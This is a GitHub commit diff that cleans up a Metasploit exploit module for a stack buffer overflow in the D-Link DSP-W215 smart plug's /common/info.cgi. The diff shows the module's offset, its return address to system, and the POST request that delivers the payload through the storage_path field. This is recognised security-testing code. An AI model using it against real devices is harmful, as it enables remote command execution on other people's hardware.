Skip to content

Commit c55117d

Browse files
committed
Some cleanup
1 parent 109201a commit c55117d

File tree

1 file changed

+13
-20
lines changed

1 file changed

+13
-20
lines changed

modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb

Lines changed: 13 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -24,26 +24,23 @@ def initialize(info = {})
2424
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
2525
],
2626
'License' => MSF_LICENSE,
27-
'Platform' => ['linux'],
27+
'Platform' => 'linux',
2828
'Arch' => ARCH_MIPSBE,
2929
'References' =>
3030
[
31-
[ 'CVE', '2014-3936' ],
32-
[ 'BID', '67651' ],
33-
[ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ], # blog post from Craig including PoC
34-
[ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
31+
['OSVDB', '108249'],
32+
['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
3533
],
3634
'Targets' =>
3735
[
3836
#
3937
# Automatic targeting via fingerprinting
4038
#
4139
[ 'Automatic Targeting', { 'auto' => true } ],
42-
4340
[ 'D-Link DSP-W215 - v1.02',
4441
{
45-
'Offset' => 477472,
46-
'Ret' => "\x00\x40\x5C\xEC", # jump to system - my_cgi.cgi
42+
'Offset' => 477472,
43+
'Ret' => "\x00\x40\x5C\xEC" # jump to system - my_cgi.cgi
4744
}
4845
]
4946
],
@@ -57,6 +54,7 @@ def check
5754
'uri' => "/common/info.cgi",
5855
'method' => 'GET'
5956
})
57+
6058
if res && [200, 301, 302].include?(res.code)
6159

6260
# trying to automatically detect a vulnerable device
@@ -67,7 +65,7 @@ def check
6765

6866
self.targets.each do |t|
6967
if (t.name =~ /DSP-W215.*1.02/) then
70-
@mytarget = t
68+
@my_target = t
7169
break
7270
end
7371
end
@@ -95,16 +93,11 @@ def check
9593
Exploit::CheckCode::Unknown
9694
end
9795

98-
def target
99-
return @mytarget if @mytarget
100-
super
101-
end
102-
10396
def exploit
10497
print_status("#{peer} - Trying to access the vulnerable URL...")
10598

10699
# Use a copy of the target
107-
@mytarget = target
100+
@my_target = target
108101

109102
unless check == Exploit::CheckCode::Detected
110103
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
@@ -118,8 +111,8 @@ def exploit
118111
end
119112

120113
def prepare_shellcode(cmd)
121-
buf = rand_text_alpha_upper(@mytarget['Offset']) # Stack filler
122-
buf << @mytarget['Ret'] # Overwrite $ra -> jump to system
114+
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
115+
buf << @my_target.ret # Overwrite $ra -> jump to system
123116

124117
# la $t9, system
125118
# la $s1, 0x440000
@@ -136,10 +129,10 @@ def execute_command(cmd, opts)
136129

137130
begin
138131
res = send_request_cgi({
139-
'method' => 'POST',
140-
'uri' => "/common/info.cgi",
132+
'method' => 'POST',
133+
'uri' => "/common/info.cgi",
141134
'encode_params' => false,
142-
'vars_post' => {
135+
'vars_post' => {
143136
'storage_path' => shellcode,
144137
}
145138
})

0 commit comments

Comments
 (0)